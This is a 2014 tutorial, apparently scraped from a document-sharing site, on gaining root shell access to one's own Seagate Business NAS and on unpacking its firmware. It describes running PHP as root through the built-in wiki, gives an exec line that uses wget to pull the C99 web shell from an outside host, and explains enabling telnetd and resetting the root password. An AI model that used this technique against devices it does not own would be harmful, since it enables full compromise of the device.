SEAGATE BUSINESS NAS ACCESSING THE SHELL. February 1, 2014 by Jeroen Diel IT Nerdbox



Similar documents
Upgrade your Software

IIS, FTP Server and Windows

Livezilla How to Install on Shared Hosting By: Jon Manning

More about Continuous Integration:

Digi Connect Wan 3G Application Guide Update the firmware, backup and restore the configuration of a Digi Connect Wan 3G using a USB flash drive.

How to Install Multicraft on a VPS or Dedicated Server (Ubuntu bit)

Information Sheet IS13011A. VS Series - Recovering / Installing the Operating System. (For Software Version 4.x) Issue

M2M Series Routers. Port Forwarding / DMZ Setup

Upgrading Redwood Engine Software. Version 2.0.x to 3.1.0

SETTING UP A LAMP SERVER REMOTELY

Using Internet or Windows Explorer to Upload Your Site

Quick Start Guide. Cerberus FTP is distributed in Canada through C&C Software. Visit us today at

AlienVault Unified Security Management (USM) 4.x-5.x. Deploying HIDS Agents to Linux Hosts

Content Management System

Installing CPV Lab Version 2.17

Version 1.0. File System. Network Settings

LAMP Quickstart for Red Hat Enterprise Linux 4

Installing a Symantec Backup Exec Agent on a SnapScale Cluster X2 Node or SnapServer DX1 or DX2. Summary

TSM for Windows Installation Instructions: Download the latest TSM Client Using the following link:

Managed Devices - Web Browser/HiView

BF2CC Daemon Linux Installation Guide

How Do I Recover infiniti Remotes and Line Cards?

XCloner Official User Manual

Extending Remote Desktop for Large Installations. Distributed Package Installs

Using Microsoft Expression Web to Upload Your Site

Marcum LLP MFT Guide

Technote 20 Using MSIE to FTP into an AcquiSuite

FTP Server Configuration

File Transfer Examples. Running commands on other computers and transferring files between computers

Binary Upgrade Procedure

FTP Accounts Contents

FlexSim LAN License Server

SSL VPN. Virtual Appliance Installation Guide. Virtual Private Networks

Contents. Platform Compatibility. Known Issues

ShadowControl ShadowStream

Conceptronic CFULLHDMA How to use Samba/CIFS and NFS

Procedure to Upgrade VIP-350PT/550PT by Web Browser

NOC PS manual. Copyright Maxnet All rights reserved. Page 1/45 NOC-PS Manuel EN version 1.3

Bootstrap guide for the File Station

CycleServer Grid Engine Support Install Guide. version 1.25

How to connect to the University of Exeter VPN service

Reboot the ExtraHop System and Test Hardware with the Rescue USB Flash Drive

Linux FTP Server Setup

SOA Software API Gateway Appliance 7.1.x Administration Guide

Cloud Backup Express

[HOW TO RECOVER AN INFINITI/EVOLUTION MODEM IDX ] 1

ProjectPier v Getting Started Guide

Overview. Remote access and file transfer. SSH clients by platform. Logging in remotely

IPMI Firmware Update (AMI) In WEB-GUI/DOS/WIN/Linux

Application Note: FTP Server Setup on computers running Windows-7 For use with 2500P-ACP1

HIPAA Compliance Use Case

Backup and Restore MySQL Databases

Laboration 3 - Administration

Dell SonicWALL Notice Concerning Multiple LDAP Vulnerabilities

DSL-G604T Install Guides

Acronis Backup & Recovery 11

MySQL Quick Start Guide

Program Update IPedge Feature Description IPedge Feature Desc. 8/2/13

Configure Backup Server for Cisco Unified Communications Manager

Server Installation/Upgrade Guide

NOTE: Please refer to the LinkNavigator CD-ROM s IP Setup Utility if you do not know the LinkStation s IP Address or Host Name.

Five Steps to Improve Internal Network Security. Chattanooga Information security Professionals

ITA Mail Archive Setup Guide

Management, Logging and Troubleshooting

Use QNAP NAS for Backup

Backing Up TestTrack Native Project Databases

Backup of ESXi Virtual Machines using Affa

ClicktoFax Service Usage Manual

Global TAC Secure FTP Site Customer User Guide

GSatTrack. Fleet Broadband Tracker. User Manual April 2011 GSE. Global Satellite Engineering. : gsat.us

NTT Web Hosting Service [User Manual]

How To Set Up A Backupassist For An Raspberry Netbook With A Data Host On A Nsync Server On A Usb 2 (Qnap) On A Netbook (Qnet) On An Usb 2 On A Cdnap (

NComputing vspace Server 8.3 for Windows. Software and Firmware Upgrade Guide. Document version 1.2

1 MAXDATA Modular System Firmware Update

HOW TO SILENTLY INSTALL CLOUD LINK REMOTELY WITHOUT SUPERVISION

Addonics T E C H N O L O G I E S. NAS Adapter. Model: NASU Key Features

NAS 109 Using NAS with Linux

NAS 224 Remote Access Manual Configuration

Creating Custom Nameservers Contents

13. Configuring FTP Services in Knoppix

Quick Note 038. Upgrade Software options and/or VPN Licenses on a Digi Transport router.

Setting up VMware ESXi for 2X VirtualDesktopServer Manual

vcenter Operations Management Pack for SAP HANA Installation and Configuration Guide

- 1 - SmartStor Cloud Web Admin Manual

Create a New Account Contents

INSTALLING KAAZING WEBSOCKET GATEWAY - HTML5 EDITION ON AN AMAZON EC2 CLOUD SERVER

RecoveryVault Express Client User Manual

Rensselaer Union Club Webhosting CPanel Guide

GeBro-BACKUP. Die Online-Datensicherung. Manual Pro Backup Client on a NAS

How to Install SMTPSwith Mailer on Centos Server/VPS

SETTING UP REMOTE ACCESS ON EYEMAX PC BASED DVR.

MIGRATING TO AVALANCHE 5.0 WITH MS SQL SERVER

Using Network Attached Storage with Linux. by Andy Pepperdine

How to install/upgrade the LANDesk virtual Cloud service appliance (CSA)

Hillstone StoneOS User Manual Hillstone Unified Intelligence Firewall Installation Manual

Customer Control Panel Manual

NSave Table of Contents

Lets Get Started In this tutorial, I will be migrating a Drupal CMS using FTP. The steps should be relatively similar for any other website.

How To Synchronize the easystore to the AD

Only LDAP-synchronized users can access SAML SSO-enabled web applications. Local end users and applications users cannot access them.

Transcription:

SEAGATE BUSINESS NAS ACCESSING THE SHELL February 1, 2014 by Jeroen Diel IT Nerdbox

P a g e 1 Table of Contents Introduction... 2 Technical specifications... 3 Gaining access to the shell... 4 Enable the Wiki server... 5 Configure the Wiki Server... 6 Create a new Wiki Page... 7 Enable the telnet daemon... 9 Adding users and change passwords... 9 Other thoughts... 10 Reverse engineering the file system... 10 Analyzing uimage & u-boot... 14

P a g e 2 Introduction The Seagate Business NAS is a file server that is used to store and share your data across your Local Area Network (LAN). The operating system on the Seagate Business NAS is Linux based, however, by default you will only get access to a web interface to control your device. As a technical person, it is preferred to have full control over your devices. However, Seagate decided not to allow this by default. This document describes how it is possible to get shell access using telnet. Being able to execute commands as root may cause your device to fail beyond recovery. If you are not familiar with Linux operating systems, this document is probably not for you. IT Nerdbox cannot be held responsible in case your device crashes or fails beyond recovery. By using this document, you agree to all the terms described in this section.

P a g e 3 Technical specifications The following table shows the technical specification regarding the Seagate Business NAS with firmware version 2013.60311. Software Version Kernel BusyBox v1.13.2-2.6.35.13-cavm1.whitney-econa.whitney-econa #2 Thu Jul 18 14:51:22 PDT 2013 armv6l Web Server PHP Lighttpd/1.4.28 PHP/5.2.13 FTP Server vsftpd 2.3.4

P a g e 4 Gaining access to the shell This section will describe how to gain shell access to Business NAS by enabling the telnet daemon. It is required to perform several steps in order to do so. Background information For those who are interested in some background information on how it is possible to gain shell access, please keep on reading. First the Wiki server has to be enabled, this is required because with the right configuration in the wiki server, it is possible to execute PHP code. The web server is running under the root account, this is required to perform certain administrative actions on the Business NAS. PHP is configured to allow all its functions, such as system and exec. By knowing these facts, it is possible to execute PHP code as the root user. By having this information it is possible to download a web shell. A web shell is a web page that is able to communicate with the operating system installed on the server using the execution environment of the web scripting language, PHP in this case. Once the web shell is loaded it is possible to execute operating system commands in an easy way. It even allows us to modify (configuration) files, suchs as the inetd.conf.

P a g e 5 Enable the Wiki server First it is required to enable the wiki server on the business NAS. In order to do so, use the following steps: 1. Log in to your Business NAS, using the administrative web interface. 2. Go to Sharing. 3. Click on Wiki Server. 4. Enter a share name, select a volume and select the enable box. Once the business NAS is done configuring the wiki share, the Go to Wiki Server button will be enabled. Click this button to go to the new wiki server.

P a g e 6 Configure the Wiki Server Once you are on the wiki page, use the login button to login. The same admin credentials can be used to login the administrative web interface of the Business NAS. Once logged in as an administrator, it is required to configure the options. In the configuration options, enable PHP and save the configuration.

P a g e 7 Create a new Wiki Page The next step is to create a new wiki page. Since PHP is enabled for Wiki pages in the previous step it is possible to execute PHP code as root. By using the <php> and </php> tags the wiki server allows the execution of PHP code. Use the following code to download the C99 web shell: <php> </php> exec( wget O shell.php http://www.c99txt.net/s/c99.txt ); Important side notes: It is important to understand that downloading a web shell to your NAS which is directly connected or available over the internet is dangerous. Anyone who is able finds this shell, has full access to your Business NAS and is able to fully compromise it. Please remove this file once you are done gaining access to the shell. Another important note is that it generally is a bad idea to allow access to any device over the internet. A good example is the Black Armor NAS for which I have written a remote root exploit. This allows anyone to take any Black Armor NAS. If it is required to have your administrative interface available over the internet, it is highly recommended to consider implementing IP restrictions for these interfaces.

P a g e 8 Once the code has been saved, click on the Show page button. Now, it seems like nothing happened, however, the PHP code downloads the c99.txt file and saves it as shell.php at the following location: http://<ip>/dokuwiki/shell.php Use your browser to go to this location. If everything went right, you should be able to see a similar screen as the screenshot below.

P a g e 9 Enable the telnet daemon In this next step, the telnet daemon will be enabled at boot. Using the web shell, navigate to the /etc/ directory and edit the file called inetd.conf. In this file, a line is commented out by the # sign at the beginning of the line. The line that needs to be enabled is: telnet stream tcp nowait root /usr/sbin/telnetd /usr/sbin/telnetd Just remove the # sign from the beginning and save the file. Now either restart inetd or reboot the NAS and the telnet daemon will be enabled. Adding users and change passwords Using the web shell, it is possible to execute certain commands to the operating system. It is useful to create new shell users and/or change the root password. Description: Add a user to the system Change a user s password Change the root password One line command: adduser <username> echo password passwd <username> echo password passwd echo password passwd root

P a g e 10 Other thoughts This section describes some of the other thoughts I have regarding the Seagate Business NAS. If you are a developer and feel like sharing idea s with me, feel free to contact me. Perhaps it is possible to set up certain projects together in order to get the most out of the Business NAS. Reverse engineering the file system Downloading the latest firmware shows two files, an.img file and a.md5 file. Extract the files to a new location. Now use WinRar to extract the.img file. While doing so a new file called is found. Since the extracted file does not have a file extension, it needs to be inspected to see what type of file it is.

P a g e 11 The file seagate_nas-update-1360311-2bay was copied to one of the Linux Virtual Machines for further inspection. Using the Linux command file it is possible to identify files. As displayed in the screenshot, the file is a tar archive which means we can extract it using the tar command: Squashfs is a compressed read-only file system for Linux. Using the command file again will display more information about this file system:

P a g e 12 Extracting the rfs.squashfs file (you might need to install the squashfs-tools): The squashfs file system has been extracted in the directory squashfs-root.

P a g e 13 This directory contains the content which was seen before using the web shell interface if you had browsed to the root (/) of the file system. It is possible to make changes to the file system and create a new file called rfs.squashfs using the command mksquashfs. It seems to be possible to write your own firmware for this Business NAS. It is currently unknown what kind of checks the Seagate Business NAS performs in order for you to upload a modified firmware. A detailed analysis of the firmware upgrade process might be required. The config.ser file might have to be modified as well since it contains MD5 hashes for the file system and the kernel.

P a g e 14 Analyzing uimage & u-boot uboot is an open source Universal Boot Loader which is frequently used in Linux based operating systems and uimage is the kernel image. Binwalk is a firmware analysis tool designed for analyzing, reverse engineering and extracting data contained in firmware images. Analyzing both files:

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information